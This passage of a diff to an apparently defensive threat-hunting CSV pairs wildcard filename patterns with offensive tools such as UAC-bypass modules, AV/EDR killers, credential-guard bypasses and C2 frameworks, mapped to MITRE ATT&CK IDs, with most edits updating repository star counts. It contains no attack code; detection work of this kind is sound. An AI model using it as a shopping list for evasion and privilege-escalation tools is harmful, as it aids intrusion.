more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*byakugan/bin/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*byakugan/bin/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Bye_Explorer.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" -"*BYOVD_kill_av_edr.*","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","1","N/A","10","3","228","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" -"*bypass_cmdinject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypass_powershell_protections*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Bypass-4MSI*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" -"*bypass-amsi*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*BYOVD_kill_av_edr.*","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","1","N/A","10","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"*bypass_cmdinject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bypass_powershell_protections*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Bypass-4MSI*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*bypass-amsi*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*BypassAV.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","10","10","830","126","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z" -"*bypass-classic.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*bypass-classic.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*BypassCredGuard.*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*BypassCredGuard-master*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" -"*BYPASS-DINVOKE*.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*BYPASS-DINVOKE.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*BYPASS-DINVOKE_MANUAL_MAPPING.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BYPASS-DINVOKE*.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BYPASS-DINVOKE.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*BYPASS-DINVOKE_MANUAL_MAPPING.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*bypass-pipe.c*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*bypass-powershell.ps1*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*bypass-powershell.ps1*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*BypassUAC *.exe*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*bypassuac fodhelper*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Bypass-UAC*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*bypassUAC*.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*bypassUAC*.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*--bypass-uac*--logontype*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" -"*bypassuac_comhijack.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*bypassuac_comhijack.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*bypassuac_compdefaults*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_compmgmtlauncher*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_eventvwr*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_fodhelper*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*bypassuac_injection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac_injection.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac_injection.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac_injection_winsxs.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bypassuac_registry.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*bypassuac_injection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security 